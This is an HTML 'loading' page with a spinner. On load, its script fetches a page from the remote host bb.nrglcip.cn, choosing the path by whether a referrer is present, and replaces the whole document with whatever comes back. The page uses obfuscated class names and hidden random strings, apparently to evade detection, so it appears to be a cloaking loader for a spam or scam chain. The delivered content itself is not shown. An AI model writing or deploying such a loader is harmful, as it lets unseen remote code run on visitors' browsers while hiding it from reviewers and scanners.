<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .heypID2Td6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .heypID2Td6 .cfbsLvu38Rj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .heypID2Td6 .content {
            line-height: 50px;
            text-align: center
        }

        .heypID2Td6 .img {
            width: 100%
        }

        .heypID2Td6 .djsNDdsbked {
            text-align: center
        }

        .heypID2Td6 .djsNDdsbked span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .heypID2Td6 .djsNDdsbked span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .heypID2Td6 .djsNDdsbked span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .heypID2Td6 .djsNDdsbked span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .heypID2Td6 .djsNDdsbked span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .heypID2Td6 .djsNDdsbked span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .heypID2Td6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iqR88dpfoph(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IOYwG1 = iqR88dpfoph('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IOYwG1 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IOYwG1 +".html?a=share";
		}
		
        ne8uqOL9=url+"#"+new Date().getTime();
        ne8uqOL9 && function() {
            $.get(ne8uqOL9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >W47CVfl83UuKAyTMnfLJRgqWdUZWlYFw1guOaBMivKP3J9ZLaWT12R2FvfVPoLS33Gpf6AJP0R9gR0E3EU6z6zJLNalDxZ52Pi</b>
<h1 style='display:none' >ZMzlW4F8B44UOb</h1>
<img  src='' style='display:none'><div class="heypID2Td6">
    <div class="cfbsLvu38Rj">
        <div class="djsNDdsbked">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >HzbtVRWwjabPacqNSt</li>
<h1 style='display:none' >e5AiYm0aZCO8iN9DdzaojjBsfuXuOqzK99DlOLsDD6A7VAKsQ4xJhUyVhlZVUnzfJ1iIKllHSBjKFEkODEfxzwkGG2pO8LZPIaoT</h1>
<li style='display:none' >HzbtVRWwjabPacqNSt</li>
<img  src='' style='display:none'>
<li style='display:none' >HzbtVRWwjabPacqNSt</li></body>
</html>